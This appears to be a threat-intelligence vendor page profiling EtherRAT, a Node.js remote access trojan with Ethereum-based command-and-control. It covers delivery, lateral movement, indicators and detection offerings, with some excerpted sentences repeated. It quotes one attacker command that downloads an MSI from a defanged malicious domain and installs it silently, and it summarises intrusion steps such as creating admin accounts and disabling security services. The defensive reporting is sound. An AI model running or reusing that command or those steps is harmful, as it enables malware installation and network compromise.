EtherRAT is a cross-platform remote access trojan implemented in Node.js that targets Windows workstations, Linux servers, and macOS systems. It provides remote command execution, file manipulation, data theft, persistence, credential theft, lateral movement, and web-server hijacking functionality. Its command-and-control discovery uses Ethereum smart contracts: infected hosts query public Ethereum RPC services to retrieve an active controller, allowing operators to rotate infrastructure without updating the implant. The malware can execute JavaScript received from its controller and uses randomized-looking request paths to blend command traffic with ordinary web activity. On Windows, EtherRAT has established persistence through user-level Run-key execution and can acquire a Node.js runtime when one is absent. It has been deployed through malicious MSI installers, including in Windows domain compromises where remote scheduled tasks, administrative shares, WMI, and SMB were used to distribute the installer across hosts. Such activity has been linked to an affiliate of the Gentlemen ransomware operation. Other observed delivery chains use phishing followed by voice-based social engineering on Microsoft Teams, in which operators impersonate IT support staff, obtain remote control through legitimate remote-access tools, and install the malicious MSI. EtherRAT has also been delivered through ClickFix-style copy-and-paste lures on Windows, while Linux server targeting has involved exploitation of server-side vulnerabilities.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Q2: What is the CVE identifier for the vulnerability exploited in this attack? ... CVE-2025–55182 ... it’s a payload that abuses a JavaScript weakness (prototype pollution + constructor escape) to escape normal restrictions, then executes the system command id on the server. | CallMeOnTheChain - EtherRAT ... Q4: What is the filename of the decrypted implant that serves as the main RAT?
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The Gentlemen Affiliate Deploys EtherRAT Across Windows Networks Using Ethereum Smart Contract C2
Threat actors are weaponizing something as ordinary as a Microsoft Teams call to slip past corporate defenses and plant EtherRAT, a stealthy cross-platform remote access trojan.
Cybercriminals are using fake IT support calls on Microsoft Teams to persuade employees to surrender control of their PCs before installing the EtherRAT remote access trojan... EtherRAT is a Node.js RAT that runs across Windows, Linux, and macOS...
Ultimately, Atos Researchers identified it to be an EtherRat malware, a recently emerging threat using Ethereum to store C2 URL addresses, preventing takedown of the infrastructure.
this payload, dubbed EtherRAT, represents something far more sophisticated. It is a persistent access implant that combines techniques from at least three documented campaigns into a single, previously unreported attack chain.
“this payload, dubbed EtherRAT… is a persistent access implant… EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution…”
30 distinct techniques documented for this family, organized by ATT&CK tactic.
The attackers used administrative shares, Windows Management Instrumentation, and remote task registration to reach internal hosts.
The operators used remote scheduled tasks to push malicious installer packages to other systems.
Scripts copied payloads to remote machines, then created tasks with names such as WinSvcUpdate2 and WindowsUpdSvc to make the activity appear routine.
One task ran under the SYSTEM account and downloaded a PowerShell script from the staging server.
deploy2.cmd uses a batch for loop to iterate through local IP addresses, creating remote Scheduled Tasks named WinSvcUpdate2.
The operators used remote scheduled tasks to push malicious installer packages to other systems.
Scripts copied payloads to remote machines, then created tasks with names such as WinSvcUpdate2 and WindowsUpdSvc to make the activity appear routine.
The script created a local administrator account, attempted to add it to Domain Admins
The intrusion enables RDP, disables RDP Network Level Authentication, modifies UAC-related policy values and creates the EtherRAT Run value.
The operators used remote scheduled tasks to push malicious installer packages to other systems.
Scripts copied payloads to remote machines, then created tasks with names such as WinSvcUpdate2 and WindowsUpdSvc to make the activity appear routine.
Once installed on a Windows host, EtherRAT executes while disguised as a configuration or data file using extensions like .ini , .tmp , or .dat .
the attacker downloads and runs a malicious MSI installer that quietly fetches a legitimate Node.js runtime, then decrypts hidden payloads bundled inside it
The EtherRAT implant polls one or more public Ethereum RPC endpoints—entry points for querying the blockchain—to retrieve its current C2 URL
Security teams should monitor for ... outbound traffic to blockchain RPC endpoints like Ethereum gateways.
The script created a local administrator account, attempted to add it to Domain Admins, disabled security services, exported registry hives, and set up a tunnel for remote access.
At the time of publication, Phexia is unique from other macOS stealers in its use of dead drop resolution with Telegram, Steam, and blockchain smart contracts to discover command and control (C2) domains for communication.
curl -s -L -o C:\users\[redacted]\AppData\Local\!r!.msi reeemso[.]forwardbox[.]co[.]uk/132/ts.msi && msiexec /i ... /qn
189 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
90 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Blockchain-reliant remote-access trojan observed in campaigns abusing Node.js.
Remote-access malware cited as being used in attacks leveraging Node.js.
A Node.js-based RAT that uses blockchain-based dead-drop C2 resolution via Ethereum RPC endpoints and supports credential theft, lateral movement, and web server hijacking across Windows and Linux targets.
A Node.js-based remote access trojan/backdoor deployed via malicious MSI installers and remote scheduled tasks for lateral movement in Windows domains. It establishes Run-key persistence, can download Node.js if absent, executes JavaScript received from its C2, steals access, and uses an Ethereum smart contract to resolve current C2 domains, complicating tracking.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.